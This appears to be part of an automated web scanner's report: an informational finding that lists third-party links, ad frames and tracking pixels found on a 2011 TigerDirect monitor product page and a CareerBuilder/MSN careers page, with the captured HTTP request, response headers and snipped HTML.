</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fforty-hour-week-for-a-livin%252Fid271622685%253Fi%253D271622700%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Forty Hour Week (For a Livin') - 40 Hour Week" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ftakin-care-of-business%252Fid342122%253Fi%253D342120%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Takin' Care of Business - Bachman-Turner Overdrive 2" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fnothin-but-a-good-time%252Fid254242268%253Fi%253D254243956%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Nothin' But a Good Time - The Best of Poison - 20 Years of Rock (Remastered)" /></a>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18"></script>
...[SNIP]...
<div class="textwidget"><a href="http://www.careerbuilder.com?lr=workbuzz&siteid=rkbuzzlg" alt="CareerBuilder.com"><img src="http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif" border="0" /></a>
...[SNIP]...
<li id="twitter-follow"><a href="http://twitter.com/CareerBuilder" rel="external">Twitter</a></li><li id="facebook-follow"><a href="http://www.facebook.com/careerbuilder" rel="external">Facebook</a>
...[SNIP]...
<br>
<img src=http://img.icbdr.com/images/pixel.gif width=1 height=1 vspace=2><br>
...[SNIP]...
<td style=padding-top:8px;>&nbsp;&nbsp;-&nbsp;<a href="http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003">
           <font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<td style=padding-bottom:12px;>&nbsp;&nbsp;-&nbsp;<a href="http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003"><font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<div class="textwidget"><a href="http://alltop.com/"><img src="http://badges.alltop.com/images/alltop_170x30_we2.jpg" width="170" height="30" alt="Alltop. We're kind of a big deal." /></a>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<div style="font-size:8px; padding-left:10px"><a href="http://www.facebook.com/careerbuilder">CareerBuilder on Facebook</a>
...[SNIP]...
<li><a href="http://www.blackcareers.com/" title="Black Careers">Black Careers</a>
...[SNIP]...
<li><a href="http://www.careerrookie.com/" title="CBcampus">Career Rookie</a>
...[SNIP]...
<li><a href="http://www.cbinstitute.com" title="CBInstitute">CBInstitute</a>
...[SNIP]...
<li><a href="http://www.cbresume.com" title="cbResume">cbResume</a></li>
<li><a href="http://www.CBSalary.com" title="CBsalary">CBsalary.com</a>
...[SNIP]...
<li><a href="http://www.careerpath.com" title="CareerPath">CareerPath</a>
...[SNIP]...
<li><a href="http://www.degreedriven.com" title="DegreeDriven">DegreeDriven</a>
...[SNIP]...
<li><a href="http://www.empleoscb.com" title="Empleos">Empleoscb</a></li>
<li><a href="http://www.employmentspot.com" title="Employment Spot">Employment Spot</a>
...[SNIP]...
<li><a href="http://www.jobs.net" title="Jobs.net">Jobs.net</a></li>
<li><a href="http://www.personified.com/">Personified</a>
...[SNIP]...
<li><a href="http://www.primecb.com/">PrimeCB</a></li>
<li><a href="http://www.truecareers.com" title="True Careers">True Careers</a>
...[SNIP]...
<li><a href="http://workinretail.com" title="WorkInRetail">WorkInRetail</a>
...[SNIP]...
<li><a href="http://www.thehiringsite.com/">The Hiring Site</a>
...[SNIP]...
<li><a href="http://askamanager.blogspot.com/">Ask A Manager</a>
...[SNIP]...
<li><a href="http://www.spherioncareerblog.com/">Big Time</a></li>
<li><a href="http://www.blogher.com/topic/business-career-personal-finance">BlogHer</a></li>
<li><a href="http://www.brazencareerist.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://www.careerhubblog.com/">CareerHub</a></li>
<li><a href="http://careerealism.wordpress.com/" title="Careerealism">Careerealism</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/laidoff/?mod=blogmod" target="_blank">CareerJournal: Laid Off and Looking</a>
...[SNIP]...
<li><a href="http://manpowerblogs.com/holmes/">Contemporary Working</a>
...[SNIP]...
<li><a href="http://www.employmentblawg.com/">Employment Blawg</a>
...[SNIP]...
<li><a href="http://evilhrlady.blogspot.com/">Evil HR Lady</a>
...[SNIP]...
<li><a href="http://www.fastcompany.com/blogs">Fast Company</a>
...[SNIP]...
<li><a href="http://www.fistfuloftalent.com/">Fistful of Talent</a>
...[SNIP]...
<li><a href="http://blog.generationrelations.com/" title="Generation Relations">Generation Relations</a>
...[SNIP]...
<li><a href="http://hrminion.blogspot.com/">HR Minion</a></li>
<li><a href="http://hrwench.blogspot.com/">HR Wench</a></li>
<li><a href="http://www.huffingtonpost.com/business/">HuffPost Business Blogs</a>
...[SNIP]...
<li><a href="http://www.humancapitalist.com/">Human Capitalist</a>
...[SNIP]...
<li><a href="http://www.jibberjobber.com/login.php">Jibber Jobber</a>
...[SNIP]...
<li><a href="http://www.jobsearchmarketing.com/">JobSearch Marketing Blog</a>
...[SNIP]...
<li><a href="http://www.jtodonnell.com/wordpress/" title="Career Insights">J.T. O&#8217;Donnell: Career Insights</a>
...[SNIP]...
<li><a href="http://keppiecareers.wordpress.com/">Keppie Careers</a>
...[SNIP]...
<li><a href="http://www.leapwalking.com/">Leap Walking</a>
...[SNIP]...
<li><a href="http://www.momsrising.org/momsblogging/">Moms Rising</a>
...[SNIP]...
<li><a href="http://blogs.msdn.com/heatherleigh/default.aspx">One Louder</a>
...[SNIP]...
<li><a href="http://www.usnews.com/blogs/outside-voices-careers/index.html">Outside Voices: Careers</a>
...[SNIP]...
<li><a href="http://blog.penelopetrunk.com/">Penelope Trunk</a>
...[SNIP]...
<li><a href="http://personalbrandingblog.wordpress.com/">Personal Branding</a>
...[SNIP]...
<li><a href="http://punkrockhr.com/">Punk Rock HR</a>
...[SNIP]...
<li><a href="http://sethgodin.typepad.com/" title="Seth Godin">Seth Godin</a>
...[SNIP]...
<li><a href="http://shiftingcareers.blogs.nytimes.com/">Shifting Careers</a>
...[SNIP]...
<li><a href="http://www.thefutureofwork.net/blog/">The Future of Work</a>
...[SNIP]...
<li><a href="http://alexandralevit.typepad.com" rel="colleague" target="_blank">Water Cooler Wisdom</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/womenomics/" title="ABC News &#8211; Womenomics">Womenomics</a>
...[SNIP]...
<p>&copy; Copyright <a href="http://www.careerbuilder.com/?SiteId=workbuzz004">CareerBuilder.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js"></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://g.redacted/2privacy/enus">MSN privacy</a>
...[SNIP]...
<li><a
href="http://g.redacted/0TO_/enus">
Legal</a></li><li><a href="http://advertising.redacted/home/home.asp">
Advertise</a>
...[SNIP]...
<li class="last"><a href="http://rss.redacted">RSS</a>
...[SNIP]...
<li class="MSNfirst"><a onclick="return Msn.Navigation.OpenPopup(this,'width=800,height=600,resizeable=no,status=no,titlebar=no,toolbar=no')"
href="http://careers.msn.com/help.aspx">
Help</a></li><li class="MSNlast"><a href="https://feedback.redacted/default.aspx?productkey=careers&amp;mkt=en-us">Feedback</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...

22.489. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:03:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=15; path=/
Set-Cookie: SRVR=WEBX11%2D04B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393&Referer=; path=/
Set-Cookie: SessionId=3551021720110129210352173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177746

<!--V2-->
<!-- Your IP is:192.204.11.202-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
<a href="http://www.tigerdirect.com"><img src="http://images.highspeedbackbone.net/masthead/bluelogo.gif" alt="TigerDirect.com" border="0" /></a>
...[SNIP]...
<form action="http://www.tigerdirect.com/applications/SearchTools/search.asp" name="searchFRM" id="searchFRM" onSubmit="return chkSrch(this.keywords)" method="get"><img src="http://images.highspeedbackbone.net/mastheadusb/backsrch.gif" border="0"><input name="keywords" type="text" id="tigerv2_searchform" size="35" maxlength="90" style="padding-bottom:-2px;" onfocus="if(this.value=='Keyword or Item #')this.value='';" value="Keyword or Item #" a
...[SNIP]...
<form name="subscribe" method="post" action="http://www.tigerdirect.com/applications/email/d_subscribe.asp" onSubmit="return chkEml(this.email)"> <img src="http://images.highspeedbackbone.net/mastheadusb/backsrch.gif" border="0"/><input id="tigerv2_dealAlertform" name="email" type="text" size="13" maxlength="50" onfocus="if(this.value=='Email Address')this.value='';" onblur="if(this.value=='')this.value='Email Address';" value=
...[SNIP]...
<a style="color:#FFFFFF; font-family:Arial, Helvetica, sans-serif;" href="http://www.tigerdirect.com/cgi-bin/ShoppingCart.asp">Cart<img src="http://images.highspeedbackbone.net/mastheadusb/cartd.gif" border="0" />&nbsp;&nbsp;
       <span id="cart_item_count">
...[SNIP]...
<div id="site_logo"><img src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/tigerLogo_overlay.png"/></div>
...[SNIP]...
<a href="#" onClick="lightbox('ccExO_wrapper','close')"><img src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/closeButton.png" alt="Close Overlay" border="0" /></a>
...[SNIP]...
<a href="javascript:void(0)" onClick="lightbox('ccExO_wrapper','close')"> <img id="ccExButton_no" src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/nothanksBtn_blue.jpg" border="0"/></a>
...[SNIP]...
<a href="javascript:void(0)" onClick="lightbox('ccExO_wrapper2','close')"> <img id="ccExButton_no" src="http://images.highspeedbackbone.net/homepage/promotions/exclusive_24hour/closeBtn_grey.jpg" border="0"/></a>
...[SNIP]...
<nolayer>
<iframe src="http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?" width="977" height="40" frameborder="0" marginwidth="0" marginheight="0" scrolling="no">
<a href="http://ad.doubleclick.net/jump/tigerdirect.com/Section_2_House;sz=977x40;abr=!ie4;abr=!ie5;abr=!ie6;ord=[timestamp]?">
<img src="http://ad.doubleclick.net/ad/tigerdirect.com/Section_2_House;sz=977x40;abr=!ie4;abr=!ie5;abr=!ie6;ord=[timestamp]?" width="977" height="40" border="0" alt="" /></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?"><img src="http://ad.doubleclick.net/ad/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]?" border="0" alt="" /></a>
...[SNIP]...
<!-- To be placed in the body of the page, where you want the banner to appear -->
<img src="http://images.highspeedbackbone.net/main/pixel-clr.gif" height="2" width="1"><br clear="all">
...[SNIP]...
<a href="/applications/Category/guidedSearch.asp?CatId=12" id="guidedsearch"><img height="30" border="0" width="145" src="http://images.highspeedbackbone.net/campaigns/yamaha/images/spacer.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="0"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td height="7"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td width="40"><img src="http://images.highspeedbackbone.net/homepage/icons_01.gif" width="40" height="30"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_02.gif" width="40" height="30"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_03.gif" width="40" height="24"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/icons_04.gif" width="40" height="25"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="/cgi-bin/order.asp?EdpNo=6532393&amp;Qty=1&amp;h2fedpno=6635886&amp;ClickSource=ITW"><img border="0" align="absmiddle" src="http://images.highspeedbackbone.net/main/buynow_sp_sm.gif" alt="Add this service plan and the main item to the shopping cart."></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/cgi-bin/order.asp?EdpNo=6532393&amp;Qty=1&amp;h2fedpno=6635947&amp;ClickSource=ITW"><img border="0" align="absmiddle" src="http://images.highspeedbackbone.net/main/buynow_sp_sm.gif" alt="Add this service plan and the main item to the shopping cart."></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="18"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=6052506&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/V18-2238-main03-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(6052506,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5372536&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A204-2220-main03-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5372536,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5532654&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A179-2264-main02-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5532654,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=5719289&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/H24-2206-main002-am.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(5719289,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<a href="/applications/searchtools/item-details.asp?EdpNo=14956&amp;csid=_21"><img src="http://images.highspeedbackbone.net/skuimages/small/A204-2222-mainv01-ec.jpg" border="0"></a>
...[SNIP]...
<a href="javascript:addToiCart(14956,1,'_21');"><img border="0" src="http://images.highspeedbackbone.net/main/buynow_sm.gif"></a>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/bluepixel.gif" width="100%" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="7"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="7" height="1"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/homepage/add.gif" width="276" height="17"></td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<a href="javascript:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1','ImageCart','scrollbars=no,width=525,height=768')"><img name="imgLarge" src="http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg" border="0" alt="Samsung B2230HD 21.5&quot; Widescreen LCD Monitor" onerror="this.src='http://images.highspeedbackbone.net/SearchTools/no_image-med.gif';"></a>
...[SNIP]...
<a href="/applications/searchtools/search.asp?keywords=Samsung&amp;mnf=758" style="border:0"><img src="http://images.highspeedbackbone.net/VendorLogos/samsung_logo.gif" border="0"></a>
...[SNIP]...
</span>.
                       <img style="vertical-align:bottom" src="http://images.highspeedbackbone.net/ratingstars/star9.gif">(
                       2 reviews)
                   </td>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/homepage/clearpixel.gif" width="1" height="3"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="10"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td colspan="4"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="15"></td>
...[SNIP]...
<a href="item-details.asp?EdpNo=6532393&amp;csid=ITD&amp;body=WARRANTY#tabs" rel="nofollow"><img src="http://images.highspeedbackbone.net/item-details/extraprotection.jpg" border="0"></a>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
</tr>
</table><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"><table>
...[SNIP]...
<a id="itemdets_submit_img" href="javascript:addToiCart(6532393,document.getElementById('q_6532393').value,'ITD');"><img src="http://images.highspeedbackbone.net/item-details/addtocart.jpg" border="0"><br>
...[SNIP]...
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="5"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=1','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-01.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-01.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=2','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-02.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-02.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=3','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-03.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-03.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=4','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-04.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-04.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=5','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-05.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-05.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a></td>
<td><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="6" height="1"></td>
...[SNIP]...
script:MM_openBrWindow('/include/AddCartfromGallery.asp?EdpNo=6532393&amp;csid=ITD&amp;Sku=S203-2293&amp;imgcart=1&amp;imgcounter=6','ImageCart','scrollbars=no,width=525,height=768')" style="border:0"><img src="http://images.highspeedbackbone.net/skuimages/gallery/small/S203-2293-06.jpg" height="40" width="40" border="0" onmouseover="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/gallery/large/S203-2293-06.jpg'; document.imgLarge.width='300'; document.imgLarge.height='300'" onMouseOut="document.imgLarge.src='http://images.highspeedbackbone.net/skuimages/large/S203-2293-main01-ec.jpg'"></a>
...[SNIP]...
<td colspan="2"><img src="http://images.highspeedbackbone.net/item-details/clearpixel.gif" width="1" height="6"></td>
...[SNIP]...
